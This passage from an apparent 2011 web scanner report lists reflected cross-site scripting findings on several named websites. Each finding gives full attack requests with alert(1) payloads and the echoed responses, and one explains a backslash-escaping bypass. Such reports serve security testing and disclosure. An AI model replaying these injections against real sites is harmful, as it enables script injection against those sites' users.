Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?fc309"><img%20src%3da%20onerror%3dalert(1)>f2948ed7988=1 HTTP/1.1
Host: www.kirtsy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 20799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" name="return" value="/submit.php?fc309\"><img src=a onerror=alert(1)>f2948ed7988=1"/>
...[SNIP]...

4.158. http://www.mister-wong.com/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mister-wong.com
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f462"><img%20src%3da%20onerror%3dalert(1)>7a35b20e713 was submitted in the REST URL parameter 1. This input was echoed as 4f462"><img src=a onerror=alert(1)>7a35b20e713 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index.php4f462"><img%20src%3da%20onerror%3dalert(1)>7a35b20e713 HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 17 Apr 2011 14:14:46 GMT
Server: Apache
Set-Cookie: wongsess=178585a74b2117df7bb2ef56a6ca693c; expires=Wed, 16 Apr 2036 20:14:46 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding
Content-Length: 5168
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<div id="main" class="c_index.php4f462"><img src=a onerror=alert(1)>7a35b20e713">
...[SNIP]...

4.159. http://www.morrisonmahoney.com/location.asp [loid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.morrisonmahoney.com
Path:   /location.asp

Issue detail

The value of the loid request parameter is copied into the HTML document as plain text between tags. The payload 99921<script>alert(1)</script>08f8719032 was submitted in the loid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /location.asp?loid=499921<script>alert(1)</script>08f8719032 HTTP/1.1
Host: www.morrisonmahoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRSQQS=KJDHBHJAGEAKKPLCPGMMOFLP; visit=0;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 16 Apr 2011 14:36:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1526
Content-Type: text/html
Cache-control: private


<html>
<head>


<SCRIPT language="javascript">
function RI(images,iparams)
{
/* si: start index
** i: current index
** ei: end index
** cc: current count
*/
si = 0;
ci=0;
cc=0;

...[SNIP]...
<td>[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'location_id = 499921<script>alert(1)</script>08f8719032'.</td>
...[SNIP]...

4.160. http://www.morrisonmahoney.com/locations.asp [stid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.morrisonmahoney.com
Path:   /locations.asp

Issue detail

The value of the stid request parameter is copied into the HTML document as plain text between tags. The payload 5f04c<script>alert(1)</script>d8c433e5d2 was submitted in the stid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /locations.asp?stid=35f04c<script>alert(1)</script>d8c433e5d2 HTTP/1.1
Host: www.morrisonmahoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRSQQS=KJDHBHJAGEAKKPLCPGMMOFLP; visit=0;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 16 Apr 2011 14:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1524
Content-Type: text/html
Cache-control: private


<html>
<head>


<SCRIPT language="javascript">
function RI(images,iparams)
{
/* si: start index
** i: current index
** ei: end index
** cc: current count
*/
si = 0;
ci=0;
cc=0;

...[SNIP]...
<td>[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'state_id=35f04c<script>alert(1)</script>d8c433e5d2'.</td>
...[SNIP]...

4.161. http://www.morrisonmahoney.com/newsrelease.asp [nrid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.morrisonmahoney.com
Path:   /newsrelease.asp

Issue detail

The value of the nrid request parameter is copied into the HTML document as plain text between tags. The payload ec521<script>alert(1)</script>6edfa1b3e51 was submitted in the nrid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsrelease.asp?nrid=534ec521<script>alert(1)</script>6edfa1b3e51 HTTP/1.1
Host: www.morrisonmahoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRSQQS=KJDHBHJAGEAKKPLCPGMMOFLP; visit=0;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 16 Apr 2011 14:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1534
Content-Type: text/html
Cache-control: private


<html>
<head>


<SCRIPT language="javascript">
function RI(images,iparams)
{
/* si: start index
** i: current index
** ei: end index
** cc: current count
*/
si = 0;
ci=0;
cc=0;

...[SNIP]...
<td>[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'news_id = 534ec521<script>alert(1)</script>6edfa1b3e51'.</td>
...[SNIP]...

4.162. http://www.mylinkvault.com/link-page.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mylinkvault.com
Path:   /link-page.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fe9b"><script>alert(1)</script>0aa220655c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /link-page.php?1fe9b"><script>alert(1)</script>0aa220655c2=1 HTTP/1.1
Host: www.mylinkvault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Set-Cookie: PHPSESSID=vp85qklqj15vc4a1q0jtqd3le4; path=/; domain=.mylinkvault.com
Vary: Accept-Encoding
Content-Length: 4249
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE php PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<tit
...[SNIP]...
<input type="hidden" name="login_referer" value="/link-page.php?1fe9b"><script>alert(1)</script>0aa220655c2=1" />
...[SNIP]...

4.163. http://www.pandasecurity.com/activescan/requirements/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pandasecurity.com
Path:   /activescan/requirements/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0b93"><script>alert(1)</script>9f112544824 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /activescan/requirements/?error=chrome&track=1&Lang=en-US&IdPais=63&b0b93"><script>alert(1)</script>9f112544824=1 HTTP/1.1
Host: www.pandasecurity.com
Proxy-Connection: keep-alive
Referer: http://www.pandasecurity.com/activescan/index/?track=1&Lang=en-US&IdPais=63
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=en-US; AlteonP=3e4506e059006be3; ASP.NET_SessionId=nwhv35nnylyjcxamklrn3y55; Track=1; __utmz=216749847.1303044902.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=216749847.633268075.1303044902.1303044902.1303044902.1; __utmc=216749847; __utmb=216749847.2.10.1303044902

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Refresh: 28790
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sun, 17 Apr 2011 13:00:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 17 Apr 2011 13:00:18 GMT
Connection: close
Set-Cookie: Language=en-US; expires=Tue, 17-Apr-2012 13:00:01 GMT; path=/activescan
Content-Length: 21102


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
   <head>
       <link type="image/x-icon" href="/activescan/images/favicon.ico" rel="shortcut ico
...[SNIP]...
<a href="http://www.pandasecurity.com/activescan/requirements/?lang=de-DE&error=chrome&track=1&IdPais=63&b0b93"><script>alert(1)</script>9f112544824=1">
...[SNIP]...

4.164. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B0%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B0%5D request parameter is copied into the HTML document as plain text between tags. The payload 765fc<script>alert(1)</script>6ee45e5a499 was submitted in the FE%5Bfe_users%5D%5B0%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E765fc<script>alert(1)</script>6ee45e5a499&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:03 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27275

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>765fc<script>alert(1)</script>6ee45e5a499');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...

4.165. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B0%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B0%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13d35\'%3balert(1)//8e6a0f23626 was submitted in the FE%5Bfe_users%5D%5B0%5D parameter. This input was echoed as 13d35\\';alert(1)//8e6a0f23626 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=13d35\'%3balert(1)//8e6a0f23626&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:20:47 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27209

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
il_html]','');
   updateForm('fe_users_form','FE[fe_users][tx_pdmylibrary_news_user]','');
   updateForm('fe_users_form','FE[fe_users][password_again]','3');
   updateForm('fe_users_form','FE[fe_users][0]','13d35\\';alert(1)//8e6a0f23626');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...

4.166. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B1%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B1%5D request parameter is copied into the HTML document as plain text between tags. The payload 79bfb<script>alert(1)</script>bbad2d37fb0 was submitted in the FE%5Bfe_users%5D%5B1%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=079bfb<script>alert(1)</script>bbad2d37fb0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:18 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>');
   updateForm('fe_users_form','FE[fe_users][1]','079bfb<script>alert(1)</script>bbad2d37fb0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...

4.167. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B2%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B2%5D request parameter is copied into the HTML document as plain text between tags. The payload ae940<script>alert(1)</script>a026835ab0d was submitted in the FE%5Bfe_users%5D%5B2%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0ae940<script>alert(1)</script>a026835ab0d&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:31 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0ae940<script>alert(1)</script>a026835ab0d');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...

4.168. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B3%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B3%5D request parameter is copied into the HTML document as plain text between tags. The payload c8d1b<script>alert(1)</script>d23dadbefc1 was submitted in the FE%5Bfe_users%5D%5B3%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0c8d1b<script>alert(1)</script>d23dadbefc1&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:41 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0c8d1b<script>alert(1)</script>d23dadbefc1');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users][6]','0');
   /*]]>
...[SNIP]...

4.169. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B4%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
